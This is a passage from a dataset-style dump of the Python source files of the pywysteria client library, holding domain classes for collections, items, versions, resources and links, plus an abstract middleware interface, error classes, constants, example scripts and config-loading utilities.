wysteria\n\n\ndef main():\n client = wysteria.Client()\n with client:\n search = client.search()\n search.params(name=\"default\")\n\n for i in range(0, 2):\n found = search.find_resources(limit=1, offset=i)\n print(\"found\", len(found), \"=>\", found[0].name, found[0].location)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.712195098400116, "alphanum_fraction": 0.712195098400116, "avg_line_length": 16.672412872314453, "blob_id": "8973425e415902bbd8b8fd1b4bcaa4cdcbc8344f", "content_id": "eb43eeadc13aa02c37784a6bb883d038541de75c", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1025, "license_type": "permissive", "max_line_length": 96, "num_lines": 58, "path": "/wysteria/domain/__init__.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"Domain module contains python classes used throughout the repo.\n\n\nFiles\n-----\n\nbase.py\n Contains abstract / parent classes that are used within the module\n\ncollection.py\n Contains Collection class\n\nitem.py\n Contains Item class\n\nversion.py\n Contains Version class\n\nlink.py\n Contains Link class\n\nresource.py\n Contains Resource class\n\nquery_desc.py\n Contains QueryDesc class. This is used by the Search class but isn't intended to be directly\n exposed.\n\n\nExported\n--------\n\nAs you might expect, this exposes only the domain object classes:\n - Collection\n - Item\n - Version\n - Resource\n - Link\n - QueryDesc\n\n\"\"\"\n\nfrom wysteria.domain.collection import Collection\nfrom wysteria.domain.item import Item\nfrom wysteria.domain.version import Version\nfrom wysteria.domain.resource import Resource\nfrom wysteria.domain.link import Link\nfrom wysteria.domain.query_desc import QueryDesc\n\n\n__all__ = [\n \"Collection\",\n \"Item\",\n \"Version\",\n \"Resource\",\n \"Link\",\n \"QueryDesc\",\n]\n" }, { "alpha_fraction": 0.513744056224823, "alphanum_fraction": 0.514691948890686, "avg_line_length": 22.70786476135254, "blob_id": "4805f97704d0761ea8cb1e053d64633d035ebda0", "content_id": "304933cacb8ba868ea70c36132879637348ae671", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2110, "license_type": "permissive", "max_line_length": 75, "num_lines": 89, "path": "/wysteria/domain/link.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\n\n\"\"\"\nfrom wysteria.domain.base import WysBaseObj\nfrom wysteria.domain.query_desc import QueryDesc\n\n\nclass Link(WysBaseObj):\n def __init__(self, conn, **kwargs):\n super().__init__(**kwargs)\n self.__conn = conn\n self._name = kwargs.get(\"name\")\n self._src = kwargs.get(\"src\")\n self._dst = kwargs.get(\"dst\")\n\n def __eq__(self, other):\n if not isinstance(other, Link):\n raise NotImplementedError()\n\n return all([\n self.id == other.id,\n self.name == other.name,\n self.source == other.source,\n self.destination == other.destination,\n ])\n\n def _encode(self) -> dict:\n \"\"\"Return dict representation of this link\n\n Returns:\n dict\n \"\"\"\n return {\n \"name\": self.name,\n \"src\": self.source,\n \"uri\": self._uri,\n \"dst\": self.destination,\n \"facets\": self.facets,\n }\n\n def _fetch_uri(self) -> str:\n \"\"\"Fetch uri from remote server.\n\n Returns:\n str\n \"\"\"\n result = self.__conn.find_links([QueryDesc().id(self.id)], limit=1)\n if result:\n return result[0].uri\n return \"\"\n\n def _update_facets(self, facets: dict):\n \"\"\"Call wysteria to update this link with the given facets\n\n Args:\n facets: dict\n \"\"\"\n self.__conn.update_link_facets(self.id, facets)\n\n @property\n def name(self) -> str:\n \"\"\"Return the name of this link\n\n Returns:\n str\n \"\"\"\n return self._name\n\n @property\n def source(self) -> str:\n \"\"\"Return the Id of the source object for this link.\n\n - Note that this could be either a Version or an Item Id.\n\n Returns:\n str\n \"\"\"\n return self._src\n\n @property\n def destination(self) -> str:\n \"\"\"Return the Id of the destination object for this link.\n\n - Note that this could be either a Version or an Item Id.\n\n Returns:\n str\n \"\"\"\n return self._dst\n" }, { "alpha_fraction": 0.5819269418716431, "alphanum_fraction": 0.5819269418716431, "avg_line_length": 25.224090576171875, "blob_id": "fd250314a7c4d0e2cb2756352853d816a8a01313", "content_id": "86df7a62eb3fba578a0dc25c4b3757f74d3a49b2", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9362, "license_type": "permissive", "max_line_length": 77, "num_lines": 357, "path": "/wysteria/middleware/abstract_middleware.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import abc\n\nfrom wysteria import constants as consts\nfrom wysteria import errors\n\n\nclass WysteriaConnectionBase(metaclass=abc.ABCMeta):\n \"\"\"\n Abstract class to represent clientside wysteria middleware\n\n Pretty much a python clone of the wysteria/common/middleware client\n interface. Valid python clients should subclass from this.\n \"\"\"\n\n @staticmethod\n def translate_server_exception(msg):\n \"\"\"Turn a wysteria error string into a python exception.\n\n Args:\n msg: error string from wysteria\n\n Raises:\n AlreadyExistsError\n NotFoundError\n InvalidInputError\n IllegalOperationError\n ServerUnavailableError\n Exception\n \"\"\"\n if consts.ERR_ALREADY_EXISTS in msg:\n raise errors.AlreadyExistsError(msg)\n elif consts.ERR_NOT_FOUND in msg:\n raise errors.NotFoundError(msg)\n elif consts.ERR_ILLEGAL in msg:\n raise errors.IllegalOperationError(msg)\n elif any([consts.ERR_INVALID in msg, \"ffjson error\" in msg]):\n raise errors.InvalidInputError(msg)\n elif consts.ERR_NOT_SERVING in msg:\n raise errors.ServerUnavailableError(msg)\n\n # something very unexpected happened\n raise Exception(msg)\n\n @abc.abstractmethod\n def connect(self):\n \"\"\"Connect to remote host(s)\n\n Raises:\n Exception if unable to establish connection to remote host(s)\n \"\"\"\n pass\n\n @abc.abstractmethod\n def close(self):\n \"\"\"Close remote connection\"\"\"\n pass\n\n @abc.abstractmethod\n def find_collections(self, query, limit=None, offset=None):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.wysteria.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.wysteria.Collection\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def find_items(self, query, limit=None, offset=None):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.wysteria.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.wysteria.Item\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def find_versions(self, query, limit=None, offset=None):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.wysteria.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.wysteria.Version\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def find_resources(self, query, limit=None, offset=None):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.wysteria.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.wysteria.Resource\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def find_links(self, query, limit=None, offset=None):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.wysteria.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.wysteria.Link\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def get_published_version(self, oid):\n \"\"\"Item ID to find published version for\n\n Args:\n oid (str): item id to find published version for\n\n Returns:\n wysteria.domain.Version or None\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def publish_version(self, oid):\n \"\"\"Version ID mark as published\n\n Args:\n oid (str): version id to publish\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def update_collection_facets(self, oid, facets):\n \"\"\"Update collection with matching ID with given facets\n\n Args:\n oid (str): collection ID to update\n facets (dict): new facets (these are added to existing facets)\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def update_version_facets(self, oid, facets):\n \"\"\"Update version with matching ID with given facets\n\n Args:\n oid (str): version ID to update\n facets (dict): new facets (these are added to existing facets)\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def update_item_facets(self, oid, facets):\n \"\"\"Update item with matching ID with given facets\n\n Args:\n oid (str): item ID to update\n facets (dict): new facets (these are added to existing facets)\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def update_resource_facets(self, oid, facets):\n \"\"\"Update resource with matching ID with given facets\n\n Args:\n oid (str): resource ID to update\n facets (dict): new facets (these are added to existing facets)\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def update_link_facets(self, oid, facets):\n \"\"\"Update link with matching ID with given facets\n\n Args:\n oid (str): link ID to update\n facets (dict): new facets (these are added to existing facets)\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def create_collection(self, collection):\n \"\"\"Create collection with given name, return ID of new collection\n\n Args:\n collection (wysteria.domain.Collection): input collection\n\n Returns:\n str\n \"\"\"\n pass\n \n @abc.abstractmethod\n def create_item(self, item):\n \"\"\"Create item with given values, return ID of new item\n\n Args:\n item (wysteria.domain.Item): input item\n\n Returns:\n str\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def create_version(self, version):\n \"\"\"Create item with given values, return ID of new version\n\n Args:\n version (wysteria.domain.Version): input version\n\n Returns:\n str, int\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n \n @abc.abstractmethod\n def create_resource(self, resource):\n \"\"\"Create item with given values, return ID of new resource\n\n Args:\n resource (wysteria.domain.Resource): input resource\n\n Returns:\n str\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n \n @abc.abstractmethod\n def create_link(self, link):\n \"\"\"Create item with given values, return ID of new link\n\n Args:\n link (wysteria.domain.Link): input link\n\n Returns:\n str\n\n Raises:\n Exception on network / server error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def delete_collection(self, oid):\n \"\"\"Delete the matching obj type with the given id\n\n Args:\n oid (str): id of obj to delete\n\n Raises:\n Exception if deletion fails / network error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def delete_item(self, oid):\n \"\"\"Delete the matching obj type with the given id\n\n (Links will be deleted automatically)\n\n Args:\n oid (str): id of obj to delete\n\n Raises:\n Exception if deletion fails / network error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def delete_version(self, oid):\n \"\"\"Delete the matching obj type with the given id\n\n (Links will be deleted automatically)\n\n Args:\n oid (str): id of obj to delete\n\n Raises:\n Exception if deletion fails / network error\n \"\"\"\n pass\n\n @abc.abstractmethod\n def delete_resource(self, oid):\n \"\"\"Delete the matching obj type with the given id\n\n Args:\n oid (str): id of obj to delete\n\n Raises:\n Exception if deletion fails / network error\n \"\"\"\n pass\n" }, { "alpha_fraction": 0.5061246156692505, "alphanum_fraction": 0.5063021183013916, "avg_line_length": 21.991836547851562, "blob_id": "72a6cd8152999ed64b063227d5e287d245aa5ac4", "content_id": "b521a753f07a85e112239ee783d494d4364c95a7", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5633, "license_type": "permissive", "max_line_length": 98, "num_lines": 245, "path": "/wysteria/domain/query_desc.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\n\n\"\"\"\nimport copy\n\n\nclass QueryDesc:\n \"\"\"\n QueryDesc (\"Query Description\") represents a single query param sent to a wysteria server.\n\n - An object must match all of the set params in order to be considered a match.\n - Multiple QueryDesc sent to Wysteria will return results that match any of the individual\n QueryDesc objects.\n - A single search request with a list of QueryDesc is sent looking for objects of a given\n type. If the desired object type lacks a property for which a QueryDesc asks for, that\n field is ignored for the purpose of the search.\n That is, if you searched for all collections and matched on {some params} which included\n \"ResourceLocation\", the \"ResourceLocation\" requirement will be ignored as Collections do not\n possess this property.\n\n \"\"\"\n def __init__(self):\n self._id = \"\"\n self._uri = \"\"\n self._parent = \"\"\n self._versionnumber = 0\n self._itemtype = \"\"\n self._variant = \"\"\n self._facets = {}\n self._name = \"\"\n self._resourcetype = \"\"\n self._location = \"\"\n self._linkdst = \"\"\n self._linksrc = \"\"\n\n @property\n def is_valid(self) -> bool:\n \"\"\"Return if at least one of our search params is set.\n\n ToDo: Consider not allowing resource_type / name queries without\n a parent or id set.\n\n Returns:\n bool\n \"\"\"\n return any([\n self._id,\n self._uri,\n self._parent,\n self._versionnumber,\n self._itemtype,\n self._variant,\n self._facets,\n self._name,\n self._resourcetype,\n self._location,\n self._linksrc,\n self._linkdst\n ])\n\n def encode(self) -> dict:\n \"\"\"Return dict representation of this object.\n\n Returns:\n dict\n \"\"\"\n return {\n \"id\": self._id,\n \"uri\": self._uri,\n \"parent\": self._parent,\n \"versionnumber\": self._versionnumber,\n \"itemtype\": self._itemtype,\n \"variant\": self._variant,\n \"facets\": copy.copy(self._facets),\n \"name\": self._name,\n \"resourcetype\": self._resourcetype,\n \"location\": self._location,\n \"linksrc\": self._linksrc,\n \"linkdst\": self._linkdst,\n }\n\n def id(self, val: str):\n \"\"\"Match on object by it's Id.\n\n Args:\n val: an Id to match on\n\n Returns:\n self\n \"\"\"\n self._id = val\n return self\n\n def uri(self, val: str):\n \"\"\"Match on object by it's Uri.\n\n Args:\n val: an Id to match on\n\n Returns:\n self\n \"\"\"\n self._uri = val\n return self\n\n def parent(self, val: str):\n \"\"\"Match object(s) by their parent Id\n\n - Nb. Links do not have a ParentId property.\n\n Args:\n val: an Id to match on\n\n Returns:\n self\n \"\"\"\n self._parent = val\n return self\n\n def version_number(self, val: int):\n \"\"\"Match version(s) by their version number.\n\n - Nb. Only Version objects have this property.\n\n Args:\n val: a number to match on\n\n Returns:\n self\n \"\"\"\n self._versionnumber = val\n return self\n\n def item_type(self, val: str):\n \"\"\"Match Item(s) by their item_type.\n\n - Nb. Only Item objects have this property.\n\n Args:\n val: a string to match on\n\n Returns:\n self\n \"\"\"\n self._itemtype = val\n return self\n\n def item_variant(self, val):\n \"\"\"Match Item(s) by their item_variant.\n\n - Nb. Only Item objects have this property.\n\n Args:\n val: a string to match on\n\n Returns:\n self\n \"\"\"\n self._variant = val\n return self\n\n def has_facets(self, **kwargs):\n \"\"\"Match objects on the given facets.\n\n Args:\n **kwargs:\n\n Returns:\n self\n \"\"\"\n self._facets = copy.copy(kwargs)\n return self\n\n def name(self, val: str):\n \"\"\"Set a name string to match objects on.\n\n - Nb. Collections, Resources and Links all have a 'name' property.\n\n Args:\n val:\n\n Returns:\n self\n \"\"\"\n self._name = val\n return self\n\n def resource_type(self, val: str):\n \"\"\"Set a resource type to match Resources on.\n\n - Nb. Only Resources have this property.\n\n Args:\n val:\n\n Returns:\n self\n \"\"\"\n self._resourcetype = val\n return self\n\n def resource_location(self, val: str):\n \"\"\"Set a location to match Resources on.\n\n - Nb. Only Resources have this property.\n\n Args:\n val:\n\n Returns:\n self\n \"\"\"\n self._location = val\n return self\n\n def link_destination(self, val: str):\n \"\"\"Set a link destination Id to match Links on.\n\n - Nb. Only Links have this property.\n\n Args:\n val:\n\n Returns:\n self\n \"\"\"\n self._linkdst = val\n return self\n\n def link_source(self, val: str):\n \"\"\"Set a link source Id to match Links on.\n\n - Nb. Only Links have this property.\n\n Args:\n val:\n\n Returns:\n self\n \"\"\"\n self._linksrc = val\n return self\n\n def __repr__(self):\n return \"<%s>\" % self.__class__.__name__\n" }, { "alpha_fraction": 0.5909090638160706, "alphanum_fraction": 0.596256673336029, "avg_line_length": 16.809524536132812, "blob_id": "4b26af09dd809329da1d2254c980cc867abfb7db", "content_id": "00216ac79a3005a0e3b6c95e67ef08a87a625e6c", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 374, "license_type": "permissive", "max_line_length": 58, "num_lines": 21, "path": "/examples/08/main.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\nExample08: Sub collections\n\"\"\"\n\nimport wysteria\n\n\ndef main():\n client = wysteria.Client()\n with client:\n collection = client.create_collection(\"foo\")\n foo_maps = collection.create_collection(\"maps\")\n\n print(collection)\n print(foo_maps)\n\n print(\"Parent of foo_maps\", foo_maps.get_parent())\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5152343511581421, "alphanum_fraction": 0.516796886920929, "avg_line_length": 22.703702926635742, "blob_id": "f38852883ea2b584036c18063de2d0f159885f8b", "content_id": "640cd052464308d515aa24b9dc59d51821d7d1ef", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2560, "license_type": "permissive", "max_line_length": 79, "num_lines": 108, "path": "/wysteria/domain/resource.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\n\n\"\"\"\n\nfrom wysteria.domain.base import ChildWysObj\nfrom wysteria.domain.query_desc import QueryDesc\n\n\nclass Resource(ChildWysObj):\n\n def __init__(self, conn, **kwargs):\n super().__init__(**kwargs)\n self.__conn = conn\n self._resourcetype = kwargs.get(\"resourcetype\")\n self._name = kwargs.get(\"name\")\n self._location = kwargs.get(\"location\")\n\n def __eq__(self, other):\n if not isinstance(other, Resource):\n raise NotImplementedError()\n\n return all([\n self.id == other.id,\n self.parent == other.parent,\n self.name == other.name,\n self.resource_type == other.resource_type,\n self.location == other.location,\n ])\n\n @property\n def resource_type(self) -> str:\n \"\"\"Return the type of this resource\n\n Returns:\n str\n \"\"\"\n return self._resourcetype\n\n def delete(self):\n \"\"\"Delete this resource.\"\"\"\n return self.__conn.delete_resource(self.id)\n\n @property\n def name(self) -> str:\n \"\"\"Return the name of this resource\n\n Returns:\n str\n \"\"\"\n return self._name\n\n @property\n def location(self) -> str:\n \"\"\"Return the location URI of this resource\n\n Returns:\n str\n \"\"\"\n return self._location\n\n def _get_parent(self):\n \"\"\"Return the parent item of this version\n\n Returns:\n domain.Item or None\n \"\"\"\n results = self.__conn.find_versions(\n [QueryDesc().id(self._parent)], limit=1\n )\n if results:\n return results[0]\n return None\n\n def _fetch_uri(self) -> str:\n \"\"\"Fetch uri from remote server.\n\n Returns:\n str\n \"\"\"\n result = self.__conn.find_resources([QueryDesc().id(self.id)], limit=1)\n if result:\n return result[0].uri\n return \"\"\n\n def _encode(self) -> dict:\n \"\"\"Encode this resource as a dict\n\n Returns:\n duct\n \"\"\"\n return {\n \"id\": self.id,\n \"uri\": self._uri,\n \"parent\": self.parent,\n \"name\": self.name,\n \"resourcetype\": self.resource_type,\n \"location\": self.location,\n \"facets\": self.facets,\n }\n\n def _update_facets(self, facets: dict):\n \"\"\"Update this resource facets with the given facets\n\n Args:\n facets (dict):\n\n \"\"\"\n self.__conn.update_resource_facets(self.id, facets)\n" }, { "alpha_fraction": 0.5363873839378357, "alphanum_fraction": 0.537837028503418, "avg_line_length": 27.040651321411133, "blob_id": "9f4aa98b68be7d2bb438856a93356a11996b457b", "content_id": "3063856d70e6fed27aa18a6afb0f6976f8112fb7", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6898, "license_type": "permissive", "max_line_length": 91, "num_lines": 246, "path": "/wysteria/domain/version.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\n\n\"\"\"\n\nfrom wysteria.domain.base import ChildWysObj\nfrom wysteria.domain.query_desc import QueryDesc\nfrom wysteria.domain.resource import Resource\nfrom wysteria.domain.link import Link\nfrom wysteria import constants as consts\n\n\nclass Version(ChildWysObj):\n\n def __init__(self, conn, **kwargs):\n super().__init__(**kwargs)\n self.__conn = conn\n self._number = kwargs.get(\"number\")\n\n def __eq__(self, other):\n if not isinstance(other, Version):\n raise NotImplementedError()\n\n return all([\n self.id == other.id,\n self.parent == other.parent,\n self.version == other.version,\n ])\n\n @property\n def _default_child_facets(self) -> dict:\n \"\"\"Returns some helpful default facets to set on child objects.\n\n Returns:\n dict\n \"\"\"\n facets = {}\n for k, v in (\n (consts.FACET_COLLECTION, self.facets.get(consts.FACET_COLLECTION)),\n (consts.FACET_ITEM_TYPE, self.facets.get(consts.FACET_ITEM_TYPE)),\n (consts.FACET_ITEM_VARIANT, self.facets.get(consts.FACET_ITEM_VARIANT)),\n (\"version\", \"%s\" % self.version),\n ):\n if not v:\n continue\n\n facets[k] = v\n return facets\n\n def delete(self):\n \"\"\"Delete this version.\"\"\"\n return self.__conn.delete_version(self.id)\n\n def add_resource(self, name, resource_type, location, facets=None):\n \"\"\"Create resource with given params as child of this version\n\n Args:\n name (str):\n resource_type (str):\n location (str):\n facets (dict): set some initial facets\n\n Returns:\n domain.Resource\n \"\"\"\n cfacets = self._default_child_facets\n if facets:\n cfacets.update(facets)\n\n r = Resource(\n self.__conn,\n parent=self.id,\n name=name,\n resourcetype=resource_type,\n location=location,\n facets=cfacets,\n )\n r._id = self.__conn.create_resource(r)\n return r\n\n def get_resources(self, name=None, resource_type=None):\n \"\"\"Return a list of resources associated with this version.\n\n Args:\n name (str): only return resources with the given name\n resource_type (str): only return resources with the given type\n\n Returns:\n []domain.Resource\n \"\"\"\n query = QueryDesc().parent(self.id)\n if name:\n query.name(name)\n if resource_type:\n query.resource_type(resource_type)\n return self.__conn.find_resources([query])\n\n def get_linked_by_name(self, name):\n \"\"\"Get linked Items by the link name\n\n Args:\n name (str):\n\n Returns:\n []domain.Version\n \"\"\"\n if not name:\n return []\n\n # step 1: grab all links whose source is our id of the correct name\n link_query = [QueryDesc().link_source(self.id).name(name)]\n links = self.__conn.find_links(link_query)\n\n # step 2: grab all vers whose id is the destination of one of our links\n version_query = [QueryDesc().id(l.destination) for l in links]\n return self.__conn.find_versions(version_query)\n\n def get_linked(self):\n \"\"\"Get all linked version and return a dict of link name (str) to\n []version\n\n Returns:\n dict\n \"\"\"\n # step 1: grab all links whose source is our id\n link_query = [QueryDesc().link_source(self.id)]\n links = self.__conn.find_links(link_query)\n\n # step 2: build version query, and record version id -> link name map\n version_id_to_link_name = {}\n version_query = []\n for link in links:\n desired_version_id = link.destination\n version_id_to_link_name[desired_version_id] = link.name\n version_query.append(\n QueryDesc().id(link.destination)\n )\n\n # step 3: return matching version list\n versions = self.__conn.find_versions(version_query)\n\n # step 4: build into link name -> []version map\n result = {}\n for version in versions:\n link_name = version_id_to_link_name.get(version.id)\n if not link_name:\n continue\n\n # ToDO: Rework into collections.defaultdict\n tmp = result.get(link_name, [])\n tmp.append(version)\n result[link_name] = tmp\n return result\n\n def _fetch_uri(self) -> str:\n \"\"\"Fetch uri from remote server.\n\n Returns:\n str\n \"\"\"\n result = self.__conn.find_versions([QueryDesc().id(self.id)], limit=1)\n if result:\n return result[0].uri\n return \"\"\n\n def _encode(self) -> dict:\n \"\"\"Encode this as a JSONifiable dict\n\n Returns:\n dict\n \"\"\"\n return {\n \"id\": self.id,\n \"uri\": self._uri,\n \"number\": self.version,\n \"parent\": self.parent,\n \"facets\": self.facets,\n }\n\n def link_to(self, name, version, facets=None):\n \"\"\"Create link between two versions\n\n Args:\n name (str):\n version (domain.Version):\n facets (dict): some defaults facets to add to link\n\n Raises:\n ValueError if given version not of type Version\n \"\"\"\n if not isinstance(version, self.__class__):\n raise ValueError(\n f\"Expected Versiob to be of type Version, got {version.__class__.__name__}\"\n )\n\n cfacets = self._default_child_facets\n cfacets[consts.FACET_LINK_TYPE] = consts.VALUE_LINK_TYPE_VERSION\n if facets:\n cfacets.update(facets)\n\n lnk = Link(\n self.__conn,\n src=self.id,\n dst=version.id,\n name=name,\n facets=cfacets,\n )\n lnk._id = self.__conn.create_link(lnk)\n return lnk\n\n def publish(self):\n \"\"\"Set this version as the published one\"\"\"\n self.__conn.publish_version(self.id)\n\n def _update_facets(self, facets):\n \"\"\"Set given key / value pairs in version facets\n\n Args:\n facets (dict):\n\n \"\"\"\n self.__conn.update_version_facets(\n self.id,\n facets\n )\n\n @property\n def version(self) -> int:\n \"\"\"Return the version number of this version\n\n Returns:\n int\n \"\"\"\n return self._number\n\n def _get_parent(self):\n \"\"\"Return the parent item of this version\n\n Returns:\n domain.Item or None\n \"\"\"\n results = self.__conn.find_items(\n [QueryDesc().id(self._parent)], limit=1\n )\n if results:\n return results[0]\n return None\n" }, { "alpha_fraction": 0.7463651299476624, "alphanum_fraction": 0.7512116432189941, "avg_line_length": 33.38888931274414, "blob_id": "74b7ef8a4c35a96b1806aedcd4eab909a2c87f29", "content_id": "67b0f75ea128e3de651d3dbee699b18b956c9273", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 619, "license_type": "permissive", "max_line_length": 86, "num_lines": 18, "path": "/wysteria/constants.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "# Where applicable, these facets are populated automatically by the client\nFACET_COLLECTION = \"collection\"\nFACET_ITEM_TYPE = \"itemtype\"\nFACET_ITEM_VARIANT = \"variant\"\nFACET_LINK_TYPE = \"linktype\"\n\n# Where FACET_LINK_TYPE is used, the value will be one of these VALUE_LINK_TYPE_* vars\nVALUE_LINK_TYPE_ITEM = \"item\"\nVALUE_LINK_TYPE_VERSION = \"version\"\n\n# A default for the 'limit' field send to wysteria on a search request.\nDEFAULT_QUERY_LIMIT = 500\n\nERR_ALREADY_EXISTS = \"already-exists\"\nERR_INVALID = \"invalid-input\"\nERR_ILLEGAL = \"illegal-operation\"\nERR_NOT_FOUND = \"not-found\"\nERR_NOT_SERVING = \"operation-rejected\"\n" }, { "alpha_fraction": 0.7176806330680847, "alphanum_fraction": 0.7176806330680847, "avg_line_length": 24.0238094329834, "blob_id": "db1eb3285d66f067f968607b28d46016809440fc", "content_id": "3b805649fc752c996a6d22424bc074b8e97285fb", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1052, "license_type": "permissive", "max_line_length": 95, "num_lines": 42, "path": "/wysteria/errors.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\nclass RequestTimeoutError(Exception):\n \"\"\"The request took too long to come back -> something is down?\"\"\"\n pass\n\n\nclass UnknownMiddlewareError(Exception):\n \"\"\"The config asks to use a middleware for which we can't find a class definition\"\"\"\n pass\n\n\nclass NoServersError(Exception):\n \"\"\"No server(s) were found, or we were unable to establish a connection to them\"\"\"\n pass\n\n\nclass ConnectionClosedError(Exception):\n \"\"\"The connection has been closed\"\"\"\n pass\n\n\nclass InvalidInputError(Exception):\n \"\"\"The input data is malformed or otherwise invalid\"\"\"\n pass\n\n\nclass AlreadyExistsError(Exception):\n \"\"\"Raised if an attempt was made to create something that already exists\"\"\"\n pass\n\n\nclass NotFoundError(Exception):\n \"\"\"An given ID to some object was not found\"\"\"\n\n\nclass IllegalOperationError(Exception):\n \"\"\"The requested operation is not permitted\"\"\"\n pass\n\n\nclass ServerUnavailableError(Exception):\n \"\"\"The server is currently unavailable. (An admin has ordered it not to server requests)\"\"\"\n pass\n" }, { "alpha_fraction": 0.6278981566429138, "alphanum_fraction": 0.6278981566429138, "avg_line_length": 24.298076629638672, "blob_id": "d967c39ca57132d898f3ad9a1c64c06894e0e654", "content_id": "8217e7a4c93d315d045be572f7f5fcf39e06f285", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2631, "license_type": "permissive", "max_line_length": 77, "num_lines": 104, "path": "/wysteria/utils.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import os\nimport configparser\nfrom collections import namedtuple\n\nfrom wysteria.client import Client\n\n\n_DEFAULT_FILENAME = \"wysteria-client.ini\"\n_DEFAULT_ENV_VAR = \"WYSTERIA_CLIENT_INI\"\n\n_KEY_MWARE = \"middleware\"\n_KEY_MWARE_DRIVER = \"driver\"\n_KEY_MWARE_CONF = \"config\"\n_KEY_MWARE_SSL_CERT = \"sslcert\"\n_KEY_MWARE_SSL_KEY = \"sslkey\"\n_KEY_MWARE_SSL_PEM = \"sslpem\"\n_KEY_MWARE_SSL_VERIFY = \"sslverify\"\n_KEY_MWARE_SSL_ENABLE = \"sslenabletls\"\n\n\n_SSLConfig = namedtuple(\"SSLConfig\", [\n \"key\", \"cert\", \"pem\", \"verify\", \"enable\",\n])\n\n\ndef _wysteria_config() -> str:\n \"\"\"Return path to default config, if found\n\n Returns:\n str or None\n \"\"\"\n for f in [_DEFAULT_FILENAME, os.environ.get(_DEFAULT_ENV_VAR)]:\n if not f:\n continue\n if os.path.exists(f):\n return f\n return None\n\n\ndef _read_config(configpath: str) -> dict:\n \"\"\"Read in config file & return as dict\n\n Args:\n configpath (str):\n\n Returns:\n dict\n \"\"\"\n config = configparser.ConfigParser()\n config.read(configpath)\n\n data = {}\n for section in config.sections():\n data[section.lower()] = {}\n for opt in config.options(section):\n data[section.lower()][opt.lower()] = config.get(section, opt)\n return data\n\n\ndef from_config(configpath: str) -> Client:\n \"\"\"Build a wysteria Client from a given config file.\n\n Args:\n configpath (str): path to a config file\n\n Returns:\n wysteria.Client\n \"\"\"\n data = _read_config(configpath)\n middleware = data.get(_KEY_MWARE, {})\n\n tls = _SSLConfig(\n middleware.get(_KEY_MWARE_SSL_KEY),\n middleware.get(_KEY_MWARE_SSL_CERT),\n middleware.get(_KEY_MWARE_SSL_PEM),\n middleware.get(_KEY_MWARE_SSL_VERIFY, \"false\") == 'true',\n 